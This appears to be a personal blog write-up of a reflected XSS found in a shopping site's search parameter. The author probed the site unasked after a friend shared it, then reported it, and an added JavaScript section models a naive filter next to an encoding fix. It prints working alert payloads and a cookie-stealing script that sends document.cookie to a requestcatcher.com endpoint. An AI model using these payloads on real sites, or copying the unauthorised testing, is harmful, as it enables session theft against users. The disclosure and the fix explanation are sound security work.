Today I will show you something interesting I just did.
A friend of mine wanted to buy a backpack from a website; she sent me the address and asked me what I thought of the backpack.
I did not really care about the backpack.
The only thing I saw was the search box on the left side of the page.
I decided to fuzz it and enumerate its parameters for a closer look.
The only parameter is "q".
First I tried some basic payloads to see how the page reacted. After about 10-15 minutes of fuzzing I suspected the site was vulnerable to XSS: when I put this into the URL
<script>alert("1337")</script>
the page responded slightly differently.
Before inputting:
After inputting:
To confirm the guess and dig further, I used a few tools.
It seemed my guess was right. But why was the alert not executing properly?
After about 2 hours of reading through the source code and trying many payloads, I figured out how to get an XSS payload to execute. Here it is:
<script>alert("1337")</script><script>alert("4rth4s")</script>
And the dialog pops up! That means the XSS vulnerability is fully exploitable:
Of course I did not want to stop there. My goal was to steal the cookie of the victim I send the link to.
First, I needed somewhere to receive data (cookies, authentication tokens, login credentials, ...) from the victim via the malicious URL. I chose Request Catcher, a handy tool for debugging and testing webhooks and HTTP clients.
Then I needed a payload that, injected into the URL, makes the victim's browser send me their cookie. After many attempts I had a working one:
<script>alert("1337")</script><script>document.location='https://4rth4s.requestcatcher.com/' +document.cookie</script>
Every cookie that the victim's browser exposes to JavaScript is sent to my Request Catcher endpoint when the link is clicked. Two caveats: cookies flagged HttpOnly are not part of document.cookie, so they are not stolen this way, and because the payload sets document.location it navigates the victim away from the page, which is visible to them.
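The post does not show the site's server-side code, so the reason a single script block was neutralised while a second one survived is not known. One common cause of exactly this behaviour is a non-recursive filter that strips only the first occurrence of a pattern. The following is an added example, not code from the post or from the site: it models a hypothetical search page that reflects "q", with a strip-once filter (an assumption used for illustration) next to the correct fix, HTML-entity encoding of the reflected value. The URL, page template and function names are all invented for the example.

```javascript
// Added example (not the original post's code). Models a search page that
// reflects the "q" parameter into an HTML text context.

// HYPOTHETICAL filter: removes the FIRST <script>...</script> block only.
// A non-global regex passed to String.prototype.replace matches once, so a
// second script block is left untouched. This is an assumed mechanism that
// reproduces the behaviour seen in the post, not the real site's code.
function naiveFilter(q) {
  return q.replace(/<script>[\s\S]*?<\/script>/i, "");
}

// Correct fix: encode every character that can change HTML structure when the
// value is placed into an element's text content.
function htmlEncode(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable and fixed versions of the same page template.
function renderVulnerable(q) {
  return `<p>Results for: ${naiveFilter(q)}</p>`;
}
function renderFixed(q) {
  return `<p>Results for: ${htmlEncode(q)}</p>`;
}

// Extract "q" from a full URL (URL-decoded by searchParams) and render the page.
function pageFor(url, render) {
  const q = new URL(url).searchParams.get("q") ?? "";
  return render(q);
}

// Check used below: does the rendered HTML still contain a live script block?
function hasLiveScript(html) {
  return /<script>[\s\S]*?<\/script>/i.test(html);
}

// The three payloads from the post, wrapped into search URLs (hypothetical host).
const SITE = "https://shop.example/search?q=";
const single = '<script>alert("1337")</script>';
const doubled = '<script>alert("1337")</script><script>alert("4rth4s")</script>';
const exfil =
  '<script>alert("1337")</script>' +
  "<script>document.location='https://4rth4s.requestcatcher.com/'+document.cookie</script>";

function demo() {
  const results = {};
  for (const [name, payload] of Object.entries({ single, doubled, exfil })) {
    const url = SITE + encodeURIComponent(payload);
    results[name] = {
      vulnerable: hasLiveScript(pageFor(url, renderVulnerable)),
      fixed: hasLiveScript(pageFor(url, renderFixed)),
    };
  }
  return results;
}

console.log(demo());
```

Run with node: the single payload is fully stripped by the hypothetical filter, while the doubled and exfiltration payloads each keep one executable script block; with htmlEncode in place none of them survive, because the browser renders `&lt;script&gt;` as literal text. Blacklisting tags is the wrong defence regardless of whether it is applied once or repeatedly (case variants, nested tags and event-handler attributes all slip past it); contextual output encoding is the fix, with HttpOnly cookies and a Content-Security-Policy as defence in depth.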
I reported this to the site admin and hope they fix it!
Update:
Reported 17/5
Fixed 17/5
Happy Hacking !